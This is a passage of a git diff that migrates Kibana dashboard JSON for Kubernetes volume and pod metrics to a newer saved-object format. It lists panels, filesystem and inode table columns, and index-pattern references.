Name\",\"id\":\"049e831a-2716-4c4b-a037-b2b45789842a\",\"selectedOptions\":[],\"enhancements\":{}}},\"60ec5f9c-087d-48e6-98ab-488952a7b186\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.volume.name\",\"title\":\"Volume Name\",\"id\":\"60ec5f9c-087d-48e6-98ab-488952a7b186\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Volumes", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "8353083b-3ad8-4814-b22f-bc7314e751d1", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Volumes", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "8353083b-3ad8-4814-b22f-bc7314e751d1", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "0f641488-aa6d-4409-9789-5967590635d5", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } + "panelIndex": "0f641488-aa6d-4409-9789-5967590635d5", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { + "columnOrder": [ + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "227c4795-30a7-48dc-990a-11fe7b4bca3c", + "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", + "a52b3682-8595-4cff-89b2-590cd5c3e6c2" + ], + "columns": { + "227c4795-30a7-48dc-990a-11fe7b4bca3c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Fs Capacity bytes", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.capacity.bytes" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "8353083b-3ad8-4814-b22f-bc7314e751d1", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "8353083b-3ad8-4814-b22f-bc7314e751d1", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { - "columnOrder": [ - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "227c4795-30a7-48dc-990a-11fe7b4bca3c", - "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", - "a52b3682-8595-4cff-89b2-590cd5c3e6c2" - ], - "columns": { - "227c4795-30a7-48dc-990a-11fe7b4bca3c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Fs Capacity bytes", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.capacity.bytes" - }, - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Volume", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.volume.name" - }, - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Fs Available bytes", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.available.bytes" - }, - "a52b3682-8595-4cff-89b2-590cd5c3e6c2": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.volume.fs.used.pct: *" - }, - "isBucketed": false, - "label": "Fs Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 3 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.used.pct" - }, - "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Fs Used bytes", - "operationType": "average", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.used.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Volume", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.volume" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.volume" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "isTransposed": false - }, - { - "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "isTransposed": false - }, - { - "columnId": "227c4795-30a7-48dc-990a-11fe7b4bca3c", - "isTransposed": false - }, - { - "columnId": "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", - "isTransposed": false - }, - { - "columnId": "a52b3682-8595-4cff-89b2-590cd5c3e6c2", - "isTransposed": false - } - ], - "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.volume.name" + }, + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Fs Available bytes", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.available.bytes" + }, + "a52b3682-8595-4cff-89b2-590cd5c3e6c2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.volume.fs.used.pct: *" + }, + "isBucketed": false, + "label": "Fs Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 3 + } } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.used.pct" }, - "title": "Filesystem Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Fs Used bytes", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.used.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e2cc978e-4d26-4a84-8c40-20a4af3abf83", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.volume" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "0f641488-aa6d-4409-9789-5967590635d5", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "0f641488-aa6d-4409-9789-5967590635d5", - "title": "Filesystem Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.volume" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "isTransposed": false + }, + { + "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "isTransposed": false + }, + { + "columnId": "227c4795-30a7-48dc-990a-11fe7b4bca3c", + "isTransposed": false + }, + { + "columnId": "a551fe3f-2761-4cfe-8b47-ed8f6d9c9540", + "isTransposed": false + }, + { + "columnId": "a52b3682-8595-4cff-89b2-590cd5c3e6c2", + "isTransposed": false + } + ], + "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" + "title": "Filesystem Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Filesystem Informations [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "eec01fb6-ac46-4573-b231-4394ac7090c0", + "w": 48, + "x": 0, + "y": 21 + }, + "panelIndex": "eec01fb6-ac46-4573-b231-4394ac7090c0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { + "columnOrder": [ + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "1e1cd98f-fe72-473f-86ab-e79a621f8527", + "b5cfcf26-889f-4514-a8b6-57f68267cfd2" + ], + "columns": { + "1e1cd98f-fe72-473f-86ab-e79a621f8527": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Free Inodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.inodes.free" + }, + "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Volume", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0": { - "columnOrder": [ - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "1e1cd98f-fe72-473f-86ab-e79a621f8527", - "b5cfcf26-889f-4514-a8b6-57f68267cfd2" - ], - "columns": { - "1e1cd98f-fe72-473f-86ab-e79a621f8527": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Free Inodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.inodes.free" - }, - "3d17c7ea-eb86-4234-9e24-9b304fc6da9b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Volume", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.volume.name" - }, - "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Inodes", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.inodes.count" - }, - "b5cfcf26-889f-4514-a8b6-57f68267cfd2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Used Inodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.volume.fs.inodes.used" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.volume" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.volume" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.volume.name" + }, + "6f2b317a-fff1-4e00-81df-b3d9c05f8f54": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Inodes", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "visualization": { - "columns": [ - { - "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", - "isTransposed": false - }, - { - "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", - "isTransposed": false - }, - { - "columnId": "1e1cd98f-fe72-473f-86ab-e79a621f8527", - "isTransposed": false - }, - { - "columnId": "b5cfcf26-889f-4514-a8b6-57f68267cfd2", - "isTransposed": false - } - ], - "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.inodes.count" }, - "title": "Filesystem Inodes Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "b5cfcf26-889f-4514-a8b6-57f68267cfd2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Used Inodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.volume.fs.inodes.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.volume" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "eec01fb6-ac46-4573-b231-4394ac7090c0", - "w": 48, - "x": 0, - "y": 21 - }, - "panelIndex": "eec01fb6-ac46-4573-b231-4394ac7090c0", - "title": "Filesystem Inodes Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Volumes", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T14:19:35.010Z", - "id": "kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "0f641488-aa6d-4409-9789-5967590635d5:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0f641488-aa6d-4409-9789-5967590635d5:e2cc978e-4d26-4a84-8c40-20a4af3abf83", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_c9e17236-d41d-4748-8eb7-54c93d5a1478:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_049e831a-2716-4c4b-a037-b2b45789842a:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.volume" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "3d17c7ea-eb86-4234-9e24-9b304fc6da9b", + "isTransposed": false + }, + { + "columnId": "6f2b317a-fff1-4e00-81df-b3d9c05f8f54", + "isTransposed": false + }, + { + "columnId": "1e1cd98f-fe72-473f-86ab-e79a621f8527", + "isTransposed": false + }, + { + "columnId": "b5cfcf26-889f-4514-a8b6-57f68267cfd2", + "isTransposed": false + } + ], + "layerId": "ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Filesystem Inodes Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_60ec5f9c-087d-48e6-98ab-488952a7b186:optionsListDataView", - "type": "index-pattern" - } + "title": "Filesystem Inodes Informations [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Volumes", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "0f641488-aa6d-4409-9789-5967590635d5:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0f641488-aa6d-4409-9789-5967590635d5:e2cc978e-4d26-4a84-8c40-20a4af3abf83", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:indexpattern-datasource-layer-ba7fdd7b-69d9-48d5-ac00-c5602e16ccd0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "eec01fb6-ac46-4573-b231-4394ac7090c0:aa3d3e9c-a555-4b69-9dc2-7f1ff0e641ff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c9e17236-d41d-4748-8eb7-54c93d5a1478:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_049e831a-2716-4c4b-a037-b2b45789842a:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_60ec5f9c-087d-48e6-98ab-488952a7b186:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json index 03af84bd555..ae59fa0ad42 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,1647 +1,1663 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\",\"selectedOptions\":[],\"enhancements\":{}}},\"c08d3539-51f7-4256-861b-c3c323edfb86\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"c08d3539-51f7-4256-861b-c3c323edfb86\",\"selectedOptions\":[],\"enhancements\":{}}},\"4a85f45a-ea4c-4514-a71c-b15979915ce3\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.pod.name\",\"title\":\"Pod Name\",\"id\":\"4a85f45a-ea4c-4514-a71c-b15979915ce3\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NiwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2\",\"selectedOptions\":[],\"enhancements\":{}}},\"c08d3539-51f7-4256-861b-c3c323edfb86\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"c08d3539-51f7-4256-861b-c3c323edfb86\",\"selectedOptions\":[],\"enhancements\":{}}},\"4a85f45a-ea4c-4514-a71c-b15979915ce3\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.pod.name\",\"title\":\"Pod Name\",\"id\":\"4a85f45a-ea4c-4514-a71c-b15979915ce3\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Pods", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "72efb777-3b17-42a9-91c5-b17ee964ce28", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Pods", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "72efb777-3b17-42a9-91c5-b17ee964ce28", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "0a10c73f-959b-40e1-b1a2-609c3fd59914", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes 